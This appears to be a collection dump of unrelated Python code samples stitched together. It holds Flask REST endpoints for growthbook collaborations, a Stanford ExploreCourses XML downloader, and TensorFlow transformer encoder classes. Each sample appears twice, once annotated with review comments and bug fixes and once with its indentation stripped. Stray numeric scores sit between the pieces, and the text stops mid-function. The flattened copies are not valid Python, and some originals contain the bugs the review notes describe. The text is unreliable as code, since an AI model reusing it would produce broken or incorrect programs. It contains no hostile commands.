        try:
            growthbook.collaborations.append(collaboration)
            growthbook.save()
        except (NotUniqueError, ValidationError) as e:
            return respond(400, {}, ['Validation error', str(e)])
        return respond(201, {'collaboration': schema.dump(collaboration).data})
class CollaborationResource(Resource):
    """REST item endpoint for a single collaboration.

    NOTE(review): DoesNotExist, ValidationError and NotUniqueError are used but
    absent from this module's visible import block -- verify the real file.
    The trailing `return respond(204)` line was fused with dataset-export
    residue in this dump and has been restored.
    """

    @jwt_required
    def get(self, id):
        """Fetch one collaboration; visible only to its collaborators."""
        try:
            collaboration = Collaboration.objects.get(id=id)
        except (DoesNotExist, ValidationError):
            return respond(404, {}, ['Collaboration does not exist'])
        if get_jwt_identity() in collaboration._instance.collaborating_identities():
            schema = CollaborationSchema()
        else:
            return respond(403, {}, ['Access forbidden'])
        return respond(200, {'collaboration': schema.dump(collaboration).data})

    @jwt_required
    def put(self, id):
        """Update a collaboration and return the refreshed document."""
        try:
            collaboration = Collaboration.objects.get(id=id)
        except (DoesNotExist, ValidationError):
            return respond(404, {}, ['Collaboration does not exist'])
        if get_jwt_identity() in collaboration._instance.collaborating_identities():
            schema = CollaborationSchema()
        else:
            return respond(403, {}, ['Access forbidden'])
        try:
            # NOTE(review): this writes schema.dump(collaboration) -- the
            # document's CURRENT state -- back, not the request payload;
            # confirm that is the intended update source.
            collaboration.update(**schema.dump(collaboration).data)
            # Return updated document
            collaboration = Collaboration.objects.get(id=id)
        except (NotUniqueError, ValidationError) as e:
            return respond(400, {}, ['Validation error', str(e)])
        return respond(200, {'collaboration': schema.dump(collaboration).data})

    @jwt_required
    def delete(self, id):
        """Delete a collaboration; collaborators only. Responds 204."""
        try:
            collaboration = Collaboration.objects.get(id=id)
        except (DoesNotExist, ValidationError):
            return respond(404, {}, ['Collaboration does not exist'])
        if get_jwt_identity() not in collaboration._instance.collaborating_identities():
            return respond(403, {}, ['Access forbidden'])
        collaboration.delete()
        return respond(204)
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_restful import Resource
from ...models import Collaboration
from ...schemas import CollaborationSchema
from .responses import respond
class CollaborationListResource(Resource):
@jwt_required
def get(self):
schema = CollaborationSchema(many=True, only=Fields.Collaboration.compact)
try:
growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['Growthbook does not exist', str(e)])
collaborations = growthbook.collaborations
if get_jwt_identity() not in growthbook.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
return respond(200, {'collaborations': schema.dump(collaborations).data})
@jwt_required
def post(self):
schema = CollaborationSchema()
collaboration = Collaboration(**schema.load(request.args).data)
collaboration.inviter = User.objects.get(username=get_jwt_identity())
try:
collaboration.invited = User.objects.get(username=request.args['username'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['User does not exist', str(e)])
try:
growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['Growthbook does not exist', str(e)])
if get_jwt_identity() not in growthbook.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
try:
growthbook.collaborations.append(collaboration)
growthbook.save()
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(201, {'collaboration': schema.dump(collaboration).data})
class CollaborationResource(Resource):
@jwt_required
def get(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() in collaboration._instance.collaborating_identities():
schema = CollaborationSchema()
else:
return respond(403, {}, ['Access forbidden'])
return respond(200, {'collaboration': schema.dump(collaboration).data})
@jwt_required
def put(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() in collaboration._instance.collaborating_identities():
schema = CollaborationSchema()
else:
return respond(403, {}, ['Access forbidden'])
try:
collaboration.update(**schema.dump(collaboration).data)
# Return updated document
collaboration = Collaboration.objects.get(id=id)
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(200, {'collaboration': schema.dump(collaboration).data})
@jwt_required
def delete(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() not in collaboration._instance.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
collaboration.delete()
return respond(204) | 0.50708 | 0.159839 |
import os
import argparse
import xmltodict
import json
import requests
from concurrent.futures import ThreadPoolExecutor
# Upper bound on concurrent department downloads.
MAX_WORKERS = 10
ENDPOINT = 'https://explorecourses.stanford.edu/'
# XML views pinned to the 2014-06-30 schema version.
# NOTE(review): name is missing a 'T' ("DEPARTMENTS"); kept as-is because it
# is referenced elsewhere in this module.
DEPARMENTS_ENDPOINT = ENDPOINT + '?view=xml-20140630'
COURSE_ENDPOINT = (ENDPOINT + 'search?view=xml-20140630&academicYear='
                   '&q={name}&filter-departmentcode-{name}=on'
                   '&filter-coursestatus-Active=on')
def fetch_departments():
    """Download the ExploreCourses school listing and flatten it.

    Returns:
        A list of dicts, one per department across every school, each with
        'name', 'longname' and 'school' keys.
    """
    response = requests.get(DEPARMENTS_ENDPOINT)
    # force_list guarantees 'school' and 'department' parse as lists even
    # when the XML contains a single element.
    parsed = xmltodict.parse(response.text, force_list=('school', 'department'))
    return [
        {
            'name': dept['@name'],
            'longname': dept['@longname'],
            'school': school['@name'],
        }
        for school in parsed['schools']['school']
        for dept in school['department']
    ]
def fetch_department_courses(name):
    """Fetch the raw XML course listing for one department code, as bytes."""
    response = requests.get(COURSE_ENDPOINT.format(name=name))
    return response.content
def process_department(name, destination):
    """Download one department's course XML and write it to *destination*.

    Args:
        name: department code, e.g. 'CS'.
        destination: path of the .xml file to create or overwrite.
    """
    print(' Processing department', name)
    raw = fetch_department_courses(name)
    # 'wb' (not the original 'wb+'): we only write, never read back, and
    # truncation of any previous download is the desired behavior.
    with open(destination, 'wb') as f:
        f.write(raw)
    print(' Finished processing department', name)
def main():
    """CLI entry point: resolve the department list, then fetch each
    department's course XML concurrently into --outdir."""
    parser = argparse.ArgumentParser(description='fast-courses fetch')
    parser.add_argument('--department', '-d', type=str)
    parser.add_argument('--inputdepartments', '-i',
                        type=argparse.FileType('r'))
    parser.add_argument('--outdir', '-o', type=str, required=True)
    args = parser.parse_args()

    print('Fetching ExploreCourses course data...')
    os.makedirs(args.outdir, exist_ok=True)

    if args.department:
        # Single explicit department overrides any list source.
        department_names = [args.department]
    elif args.inputdepartments:
        print(' Using input departments', args.inputdepartments.name)
        department_data = json.load(args.inputdepartments)
        department_names = [d['name'] for d in department_data]
    else:
        print(' Fetching fresh list of departments')
        department_data = fetch_departments()
        # Persist the list so later runs can use --inputdepartments.
        dest = os.path.join(args.outdir, 'departments.json')
        with open(dest, 'w') as f:
            json.dump(department_data, f, indent=4)
        print(' Finished fetching fresh list of departments!')
        department_names = [d['name'] for d in department_data]

    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        futures = [
            executor.submit(process_department, name,
                            os.path.join(args.outdir, name + '.xml'))
            for name in department_names
        ]
        # BUG FIX: the original fire-and-forget submit() silently discarded
        # worker exceptions; .result() re-raises them so failures are visible.
        for future in futures:
            future.result()

    print('Finished fetching ExploreCourses course data!')


if __name__ == '__main__':
    main()
import argparse
import xmltodict
import json
import requests
from concurrent.futures import ThreadPoolExecutor
MAX_WORKERS = 10
ENDPOINT = 'https://explorecourses.stanford.edu/'
DEPARMENTS_ENDPOINT = ENDPOINT + '?view=xml-20140630'
COURSE_ENDPOINT = (ENDPOINT + 'search?view=xml-20140630&academicYear='
'&q={name}&filter-departmentcode-{name}=on'
'&filter-coursestatus-Active=on')
def fetch_departments():
r = requests.get(DEPARMENTS_ENDPOINT)
body = xmltodict.parse(r.text, force_list=('school', 'department'))
result = []
for school in body['schools']['school']:
school_name = school['@name']
for department in school['department']:
result.append({
'name': department['@name'],
'longname': department['@longname'],
'school': school_name
})
return result
def fetch_department_courses(name):
r = requests.get(COURSE_ENDPOINT.format(name=name))
return r.content
def process_department(name, destination):
print(' Processing department', name)
raw = fetch_department_courses(name)
with open(destination, 'wb+') as f:
f.write(raw)
print(' Finished processing department', name)
def main():
parser = argparse.ArgumentParser(description='fast-courses fetch')
parser.add_argument('--department', '-d', type=str)
parser.add_argument('--inputdepartments', '-i',
type=argparse.FileType('r'))
parser.add_argument('--outdir', '-o', type=str, required=True)
args = parser.parse_args()
print('Fetching ExploreCourses course data...')
os.makedirs(args.outdir, exist_ok=True)
if args.department:
department_names = [args.department]
else:
if args.inputdepartments:
print(' Using input departments', args.inputdepartments.name)
department_data = json.load(args.inputdepartments)
else:
print(' Fetching fresh list of departments')
department_data = fetch_departments()
dest = os.path.join(args.outdir, 'departments.json')
with open(dest, 'w+') as f:
json.dump(department_data, f, indent=4)
print(' Finished fetching fresh list of departments!')
department_names = [d['name'] for d in department_data]
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
for name in department_names:
dest = os.path.join(args.outdir, name + '.xml')
executor.submit(process_department, name, dest)
print('Finished fetching ExploreCourses course data!')
if __name__ == '__main__':
main() | 0.263126 | 0.082438 |
import tensorflow as tf
from official.transformer.model import attention_layer, ffn_layer, transformer, model_utils, model_params
from tensor2tensor.models.research import universal_transformer, universal_transformer_util
from tensor2tensor.models import transformer as t2t_transformer
def create(params, transformer_params, mode):
    """Build the encoder variant selected by params.transformer_type.

    Raises KeyError for an unknown transformer_type, matching the previous
    dict-dispatch behavior.
    """
    transformer_params.use_convolution = params.use_convolution
    is_training = mode == tf.estimator.ModeKeys.TRAIN
    kind = params.transformer_type
    if kind == 'transformer':
        return Transformer(transformer_params, is_training)
    if kind == 'universal':
        return UniversalTransformer(transformer_params, is_training)
    if kind == 'adaptive':
        return AdaptiveUniversalTransformer(transformer_params, mode)
    raise KeyError(kind)
def sentence_transformer_params(params):
    """Derive sentence-level transformer hyperparameters from global params.

    Returns tensor2tensor hparams for the 'adaptive' type, otherwise the
    official-model TransformerBaseParams, both sized by toks_per_sent and
    the sentence_transformer_* settings.
    """
    if params.transformer_type != 'adaptive':
        tparams = model_params.TransformerBaseParams()
        tparams.batch_size = params.batch_size
        tparams.max_length = params.toks_per_sent
        tparams.vocab_size = params.vocab_size
        tparams.hidden_size = params.embedding_size
        tparams.num_heads = params.sentence_transformer_num_heads
        tparams.num_hidden_layers = params.sentence_transformer_num_stacks
        return tparams

    hparams = universal_transformer.adaptive_universal_transformer_base()
    hparams.batch_size = params.batch_size
    hparams.recurrence_type = 'act'
    hparams.act_type = 'basic'
    hparams.max_length = params.toks_per_sent
    hparams.hidden_size = params.embedding_size
    hparams.num_heads = params.sentence_transformer_num_heads
    hparams.num_hidden_layers = params.sentence_transformer_num_stacks
    # Extra fields the t2t base hparams do not declare.
    hparams.add_hparam("vocab_size", params.vocab_size)
    hparams.add_hparam("embedding_device", params.embedding_device)
    return hparams
def base_transformer_params(params):
    """Derive document-level transformer hyperparameters from global params.

    Same shape as sentence_transformer_params but sized by max_doc_len and
    the base_transformer_* settings.
    """
    if params.transformer_type != 'adaptive':
        tparams = model_params.TransformerBaseParams()
        tparams.batch_size = params.batch_size
        tparams.max_length = params.max_doc_len
        tparams.vocab_size = params.vocab_size
        tparams.hidden_size = params.embedding_size
        tparams.num_heads = params.base_transformer_num_heads
        tparams.num_hidden_layers = params.base_transformer_num_stacks
        return tparams

    hparams = universal_transformer.adaptive_universal_transformer_base()
    hparams.batch_size = params.batch_size
    hparams.recurrence_type = 'act'
    hparams.act_type = 'basic'
    hparams.max_length = params.max_doc_len
    hparams.hidden_size = params.embedding_size
    hparams.num_heads = params.base_transformer_num_heads
    hparams.num_hidden_layers = params.base_transformer_num_stacks
    # Extra fields the t2t base hparams do not declare.
    hparams.add_hparam("vocab_size", params.vocab_size)
    hparams.add_hparam("embedding_device", params.embedding_device)
    return hparams
class Transformer(transformer.Transformer):
    """Official Transformer extended with an encode path that skips the
    embedding lookup, for callers that already hold embedded inputs."""

    def encode_no_lookup(self, embedded_inputs, inputs_mask):
        """Encoder step for transformer given already-embedded inputs.

        Args:
          embedded_inputs: float tensor with shape
            [batch_size, input_length, emb_size].
          inputs_mask: int tensor with shape [batch_size, input_length];
            used to derive the padding indicator and attention bias.

        Returns:
          float tensor with shape [batch_size, input_length, hidden_size]
        """
        with tf.name_scope("encode"):
            # Prepare inputs to the layer stack by adding positional encodings and
            # applying dropout.
            inputs_padding = model_utils.get_padding(inputs_mask)
            attention_bias = model_utils.get_padding_bias(inputs_mask)
            with tf.name_scope("add_pos_encoding"):
                length = tf.shape(embedded_inputs)[1]
                pos_encoding = model_utils.get_position_encoding(
                    length, self.params.hidden_size)
                encoder_inputs = embedded_inputs + pos_encoding
            # Input dropout only at training time.
            if self.train:
                encoder_inputs = tf.nn.dropout(
                    encoder_inputs, 1 - self.params.layer_postprocess_dropout)
            return self.encoder_stack(encoder_inputs, attention_bias, inputs_padding)
class UniversalTransformer(Transformer):
    """Transformer variant that swaps in the EncoderStackUniv encoder stack."""

    def __init__(self, params, train):
        super(UniversalTransformer, self).__init__(params, train)
        # Replace the encoder stack built by the base class with the
        # scope-reusing variant defined below.
        self.encoder_stack = EncoderStackUniv(params, train)
class AdaptiveUniversalTransformer:
    """Adaptive (ACT) Universal Transformer encoder wrapper.

    Thin wrapper over tensor2tensor's UniversalTransformerEncoder that owns
    its word-embedding table and keeps it on a configurable device.
    """

    def __init__(self, params, mode):
        # NOTE(review): filter size is hard-coded here, overriding whatever
        # the supplied hparams carried — confirm this is intentional.
        params.filter_size = 512
        self.hparams = params
        # Target-space id handed to transformer_prepare_encoder below.
        self.target_space = 0
        self.model = universal_transformer.UniversalTransformerEncoder(params, mode)
        self.embedding_device = params.embedding_device
        # Keep the (potentially large) embedding table on the requested device.
        with tf.device(self.embedding_device):
            self.word_embeddings = tf.get_variable("word_embeddings", shape=[params.vocab_size, params.hidden_size])

    def encode(self, inputs, input_mask=None, _target_space=None, _hparams=None, _features=None, _losses=None):
        """Encode transformer inputs.

        Args:
          inputs: Transformer inputs [batch_size, input_length] int64 tensor.
          input_mask: optional [batch_size, input_length, hidden_size] tensor
            that is ADDED to the embedded inputs (despite the name, it is an
            additive term, not a multiplicative mask).
          _target_space: unused; kept for signature compatibility.
          _hparams: unused; kept for signature compatibility.
          _features: unused; kept for signature compatibility.
          _losses: unused; kept for signature compatibility.

        Returns:
          Tuple of:
            encoder_output: Encoder representation,
              [batch_size, input_length, hidden_dim]
            encoder_extra_output: extra encoder output used in some variants
              of the model (e.g. in ACT, to pass the ponder-time to body)
        """
        # [batch_size, input_length]; token id 0 is treated as padding.
        nonpadding = tf.to_float(tf.not_equal(inputs, 0))
        with tf.device(self.embedding_device):
            # [batch_size, input_length, hidden_dim]
            inputs = tf.nn.embedding_lookup(self.word_embeddings, inputs)
        if input_mask is not None:
            inputs += input_mask
        return self.encode_no_lookup(inputs, nonpadding)

    def encode_no_lookup(self, embedded_inputs, inputs_mask):
        """Encoder step for transformer given already-embedded inputs.

        Args:
          embedded_inputs: float tensor with shape
            [batch_size, input_length, emb_size].
          inputs_mask: float tensor with shape [batch_size, input_length];
            1.0 marks real tokens, 0.0 marks padding.

        Returns:
          Tuple of (encoder_output, encoder_extra_output); encoder_output has
          shape [batch_size, input_length, hidden_size].
        """
        (encoder_input, self_attention_bias, _) = (
            t2t_transformer.transformer_prepare_encoder(embedded_inputs, self.target_space, self.hparams))
        # Input dropout; applied unconditionally — the rate comes from hparams.
        encoder_input = tf.nn.dropout(encoder_input,
                                      1.0 - self.hparams.layer_prepostprocess_dropout)
        (encoder_output, encoder_extra_output) = (
            universal_transformer_util.universal_transformer_encoder(
                encoder_input,
                self_attention_bias,
                self.hparams,
                nonpadding=inputs_mask,
                save_weights_to=self.model.attention_weights))
        return encoder_output, encoder_extra_output
class EncoderStack(tf.layers.Layer):
    """Transformer encoder stack.

    The encoder stack is made up of N identical layers. Each layer is composed
    of the sublayers:
      1. Self-attention layer
      2. Feedforward network (which is 2 fully-connected layers)

    NOTE(review): this subclass only builds the sublayers and defines no
    call() of its own — presumably a stack call from the base/official model
    is relied on; confirm where this class is invoked.
    """

    def __init__(self, params, train):
        super(EncoderStack, self).__init__()
        self.layers = []
        for _ in range(params.num_hidden_layers):
            # Create sublayers for each layer.
            self_attention_layer = attention_layer.SelfAttention(
                params.hidden_size, params.num_heads, params.attention_dropout, train)
            # Convolutional FFN variant when requested, otherwise the stock
            # two-layer feedforward network from the official model.
            feed_forward_network = ConvolutionalFeedForwardNetwork(
                params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
                ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
            self.layers.append([
                transformer.PrePostProcessingWrapper(self_attention_layer, params, train),
                transformer.PrePostProcessingWrapper(feed_forward_network, params, train)])
        # Create final layer normalization layer.
        self.output_normalization = transformer.LayerNormalization(params.hidden_size)
# noinspection PyAbstractClass
class EncoderStackUniv(tf.layers.Layer):
    """Universal-transformer-style encoder stack.

    The encoder stack is made up of N identical layers. Each layer is composed
    of the sublayers:
      1. Self-attention layer
      2. Feedforward network (which is 2 fully-connected layers)

    Unlike EncoderStack, call() enters the same named variable scope with
    AUTO_REUSE on every layer — apparently intended to share weights across
    layers (the "universal" recurrence); TODO confirm tf.layers name
    uniquification does not defeat the sharing.
    """

    def __init__(self, params, train):
        super(EncoderStackUniv, self).__init__()
        self.layers = []
        for _ in range(params.num_hidden_layers):
            # Create sublayers for each layer.
            self_attention_layer = attention_layer.SelfAttention(
                params.hidden_size, params.num_heads, params.attention_dropout, train)
            feed_forward_network = ConvolutionalFeedForwardNetwork(
                params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
                ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
            self.layers.append([
                PrePostProcessingWrapper(self_attention_layer, params, train),
                PrePostProcessingWrapper(feed_forward_network, params, train)])
        # Create final layer normalization layer.
        self.output_normalization = transformer.LayerNormalization(params.hidden_size)

    # noinspection PyMethodOverriding
    def call(self, encoder_inputs, attention_bias, inputs_padding):
        """Return the output of the encoder layer stacks.

        Args:
          encoder_inputs: tensor with shape [batch_size, input_length, hidden_size]
          attention_bias: bias for the encoder self-attention layer,
            shape [batch_size, 1, 1, input_length]
          inputs_padding: padding indicator forwarded to the feedforward network.

        Returns:
          Output of encoder layer stack.
          float32 tensor with shape [batch_size, input_length, hidden_size]
        """
        for n, layer in enumerate(self.layers):
            # Run inputs through the sublayers.
            self_attention_layer = layer[0]
            feed_forward_network = layer[1]
            # Same scope name + AUTO_REUSE on every iteration — see class note.
            with tf.variable_scope("encoder_stack_univ", reuse=tf.AUTO_REUSE):
                with tf.variable_scope("self_attention"):
                    encoder_inputs = self_attention_layer(encoder_inputs, attention_bias)
                with tf.variable_scope("ffn"):
                    encoder_inputs = feed_forward_network(encoder_inputs, inputs_padding)
        return self.output_normalization(encoder_inputs)
class PrePostProcessingWrapper(object):
    """Wrapper that post-processes a sublayer's output.

    Applies the wrapped layer, then a residual connection, dropout (during
    training), and finally layer normalization — the order the original
    comments described.
    """

    def __init__(self, layer, params, train):
        self.layer = layer
        self.postprocess_dropout = params.layer_postprocess_dropout
        self.train = train
        # Create normalization layer
        self.layer_norm = transformer.LayerNormalization(params.hidden_size)

    def __call__(self, x, *args, **kwargs):
        # Get layer output
        y = self.layer(x, *args, **kwargs)
        # residual connection
        y = y + x
        # BUG FIX: the original declared `global y` AFTER assigning y, which is
        # a SyntaxError in Python; `y` is an ordinary local, no declaration needed.
        if self.train:
            y = tf.nn.dropout(y, 1 - self.postprocess_dropout)
        # BUG FIX: the original returned self.layer_norm(x), discarding the
        # layer output, residual and dropout entirely; normalize `y` instead.
        return self.layer_norm(y)
class ConvolutionalFeedForwardNetwork(tf.layers.Layer):
    """Feedforward sublayer: dense filter layer -> 1-D convolution -> dense output."""

    def __init__(self, hidden_size, filter_size, relu_dropout, train):
        super(ConvolutionalFeedForwardNetwork, self).__init__()
        self.hidden_size = hidden_size
        self.filter_size = filter_size
        self.relu_dropout = relu_dropout
        self.train = train
        self.filter_dense_layer = tf.layers.Dense(
            filter_size, use_bias=True, activation=tf.nn.relu, name="filter_layer")
        # BUG FIX: kernel_size=5 with the default padding='valid' shortens the
        # sequence by 4, which breaks the scatter_nd re-padding below (updates
        # no longer match nonpad_ids) and violates the documented
        # [batch_size, length, hidden_size] output contract; use 'same'.
        self.convolutional_layer = tf.layers.Conv1D(
            filters=filter_size, kernel_size=5, padding='same', use_bias=True,
            activation=tf.nn.relu, name='conv_layer')
        self.output_dense_layer = tf.layers.Dense(
            hidden_size, use_bias=True, name="output_layer")

    def call(self, x, padding=None):
        """Return outputs of the feedforward network.

        Args:
          x: tensor with shape [batch_size, length, hidden_size]
          padding: (optional) If set, the padding values are temporarily removed
            from x. The padding values are placed back in the output tensor in the
            same locations. shape [batch_size, length]

        Returns:
          Output of the feedforward network.
          tensor with shape [batch_size, length, hidden_size]
        """
        # Retrieve dynamically known shapes
        batch_size = tf.shape(x)[0]
        length = tf.shape(x)[1]

        if padding is not None:
            with tf.name_scope("remove_padding"):
                # Flatten padding to [batch_size*length]
                pad_mask = tf.reshape(padding, [-1])
                nonpad_ids = tf.to_int32(tf.where(pad_mask < 1e-9))

                # Reshape x to [batch_size*length, hidden_size] to remove padding
                x = tf.reshape(x, [-1, self.hidden_size])
                x = tf.gather_nd(x, indices=nonpad_ids)

                # Reshape x from 2 dimensions to 3 dimensions: a single "batch"
                # holding every non-padding position.
                x.set_shape([None, self.hidden_size])
                x = tf.expand_dims(x, axis=0)

        output = self.filter_dense_layer(x)
        if self.train:
            output = tf.nn.dropout(output, 1.0 - self.relu_dropout)
        output = self.convolutional_layer(output)
        output = self.output_dense_layer(output)

        if padding is not None:
            with tf.name_scope("re_add_padding"):
                output = tf.squeeze(output, axis=0)
                # Scatter the non-padding rows back into a zero tensor of the
                # original flattened shape, then restore [batch, length, hidden].
                output = tf.scatter_nd(
                    indices=nonpad_ids,
                    updates=output,
                    shape=[batch_size * length, self.hidden_size]
                )
                output = tf.reshape(output, [batch_size, length, self.hidden_size])
        return output
from official.transformer.model import attention_layer, ffn_layer, transformer, model_utils, model_params
from tensor2tensor.models.research import universal_transformer, universal_transformer_util
from tensor2tensor.models import transformer as t2t_transformer
def create(params, transformer_params, mode):
transformer_params.use_convolution = params.use_convolution
constructor = {'transformer': lambda: Transformer(transformer_params, mode == tf.estimator.ModeKeys.TRAIN),
'universal': lambda: UniversalTransformer(transformer_params, mode == tf.estimator.ModeKeys.TRAIN),
'adaptive': lambda: AdaptiveUniversalTransformer(transformer_params, mode)}
return constructor[params.transformer_type]()
def sentence_transformer_params(params):
if params.transformer_type == 'adaptive':
hparams = universal_transformer.adaptive_universal_transformer_base()
hparams.batch_size = params.batch_size
hparams.recurrence_type = 'act'
hparams.act_type = 'basic'
hparams.max_length = params.toks_per_sent
hparams.num_hidden_layers = params.sentence_transformer_num_stacks
hparams.add_hparam("vocab_size", params.vocab_size)
hparams.hidden_size = params.embedding_size
hparams.num_heads = params.sentence_transformer_num_heads
hparams.add_hparam("embedding_device", params.embedding_device)
return hparams
tparams = model_params.TransformerBaseParams()
tparams.batch_size = params.batch_size
tparams.max_length = params.toks_per_sent
tparams.vocab_size = params.vocab_size
tparams.hidden_size = params.embedding_size
tparams.num_heads = params.sentence_transformer_num_heads
tparams.num_hidden_layers = params.sentence_transformer_num_stacks
return tparams
def base_transformer_params(params):
if params.transformer_type == 'adaptive':
hparams = universal_transformer.adaptive_universal_transformer_base()
hparams.batch_size = params.batch_size
hparams.recurrence_type = 'act'
hparams.act_type = 'basic'
hparams.max_length = params.max_doc_len
hparams.num_hidden_layers = params.base_transformer_num_stacks
hparams.add_hparam("vocab_size", params.vocab_size)
hparams.hidden_size = params.embedding_size
hparams.num_heads = params.base_transformer_num_heads
hparams.add_hparam("embedding_device", params.embedding_device)
return hparams
tparams = model_params.TransformerBaseParams()
tparams.batch_size = params.batch_size
tparams.max_length = params.max_doc_len
tparams.vocab_size = params.vocab_size
tparams.hidden_size = params.embedding_size
tparams.num_heads = params.base_transformer_num_heads
tparams.num_hidden_layers = params.base_transformer_num_stacks
return tparams
class Transformer(transformer.Transformer):
def encode_no_lookup(self, embedded_inputs, inputs_mask):
"""Encoder step for transformer given already-embedded inputs
Args:
model: transformer model
embedded_inputs: int tensor with shape [batch_size, input_length, emb_size].
inputs_mask: int tensor with shape [batch_size, input_length]
params: transformer_params
train: boolean flag
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
with tf.name_scope("encode"):
# Prepare inputs to the layer stack by adding positional encodings and
# applying dropout.
inputs_padding = model_utils.get_padding(inputs_mask)
attention_bias = model_utils.get_padding_bias(inputs_mask)
with tf.name_scope("add_pos_encoding"):
length = tf.shape(embedded_inputs)[1]
pos_encoding = model_utils.get_position_encoding(
length, self.params.hidden_size)
encoder_inputs = embedded_inputs + pos_encoding
if self.train:
encoder_inputs = tf.nn.dropout(
encoder_inputs, 1 - self.params.layer_postprocess_dropout)
return self.encoder_stack(encoder_inputs, attention_bias, inputs_padding)
class UniversalTransformer(Transformer):
def __init__(self, params, train):
super(UniversalTransformer, self).__init__(params, train)
self.encoder_stack = EncoderStackUniv(params, train)
class AdaptiveUniversalTransformer:
def __init__(self, params, mode):
params.filter_size = 512
self.hparams = params
self.target_space = 0
self.model = universal_transformer.UniversalTransformerEncoder(params, mode)
self.embedding_device = params.embedding_device
with tf.device(self.embedding_device):
self.word_embeddings = tf.get_variable("word_embeddings", shape=[params.vocab_size, params.hidden_size])
def encode(self, inputs, input_mask=None, _target_space=None, _hparams=None, _features=None, _losses=None):
"""Encode transformer inputs.
Args:
inputs: Transformer inputs [batch_size, input_length] int64 tensor.
input_mask: [batch_size, input_length, hidden_size] mask
_target_space: scalar, target space ID.
_hparams: hyperparmeters for model.
_features: optionally pass the entire features dictionary as well.
This is needed now for "packed" datasets.
_losses: Unused.
Returns:
Tuple of:
encoder_output: Encoder representation.
[batch_size, input_length, hidden_dim]
encoder_extra_output: which is extra encoder output used in some
variants of the model (e.g. in ACT, to pass the ponder-time to body)
"""
# [batch_size, input_length]
nonpadding = tf.to_float(tf.not_equal(inputs, 0))
with tf.device(self.embedding_device):
# [batch_size, input_length, hidden_dim]
inputs = tf.nn.embedding_lookup(self.word_embeddings, inputs)
if input_mask is not None:
inputs += input_mask
return self.encode_no_lookup(inputs, nonpadding)
def encode_no_lookup(self, embedded_inputs, inputs_mask):
"""Encoder step for transformer given already-embedded inputs
Args:
embedded_inputs: int tensor with shape [batch_size, input_length, emb_size].
inputs_mask: tensor with shape [batch_size, input_length]
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
(encoder_input, self_attention_bias, _) = (
t2t_transformer.transformer_prepare_encoder(embedded_inputs, self.target_space, self.hparams))
encoder_input = tf.nn.dropout(encoder_input,
1.0 - self.hparams.layer_prepostprocess_dropout)
(encoder_output, encoder_extra_output) = (
universal_transformer_util.universal_transformer_encoder(
encoder_input,
self_attention_bias,
self.hparams,
nonpadding=inputs_mask,
save_weights_to=self.model.attention_weights))
return encoder_output, encoder_extra_output
class EncoderStack(tf.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params, train):
super(EncoderStack, self).__init__()
self.layers = []
for _ in range(params.num_hidden_layers):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params.hidden_size, params.num_heads, params.attention_dropout, train)
feed_forward_network = ConvolutionalFeedForwardNetwork(
params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
self.layers.append([
transformer.PrePostProcessingWrapper(self_attention_layer, params, train),
transformer.PrePostProcessingWrapper(feed_forward_network, params, train)])
# Create final layer normalization layer.
self.output_normalization = transformer.LayerNormalization(params.hidden_size)
# noinspection PyAbstractClass
class EncoderStackUniv(tf.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params, train):
super(EncoderStackUniv, self).__init__()
self.layers = []
for _ in range(params.num_hidden_layers):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params.hidden_size, params.num_heads, params.attention_dropout, train)
feed_forward_network = ConvolutionalFeedForwardNetwork(
params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
self.layers.append([
PrePostProcessingWrapper(self_attention_layer, params, train),
PrePostProcessingWrapper(feed_forward_network, params, train)])
# Create final layer normalization layer.
self.output_normalization = transformer.LayerNormalization(params.hidden_size)
# noinspection PyMethodOverriding
def call(self, encoder_inputs, attention_bias, inputs_padding):
"""Return the output of the encoder layer stacks.
Args:
encoder_inputs: tensor with shape [batch_size, input_length, hidden_size]
attention_bias: bias for the encoder self-attention layer.
[batch_size, 1, 1, input_length]
inputs_padding: P
Returns:
Output of encoder layer stack.
float32 tensor with shape [batch_size, input_length, hidden_size]
"""
for n, layer in enumerate(self.layers):
# Run inputs through the sublayers.
self_attention_layer = layer[0]
feed_forward_network = layer[1]
with tf.variable_scope("encoder_stack_univ", reuse=tf.AUTO_REUSE):
with tf.variable_scope("self_attention"):
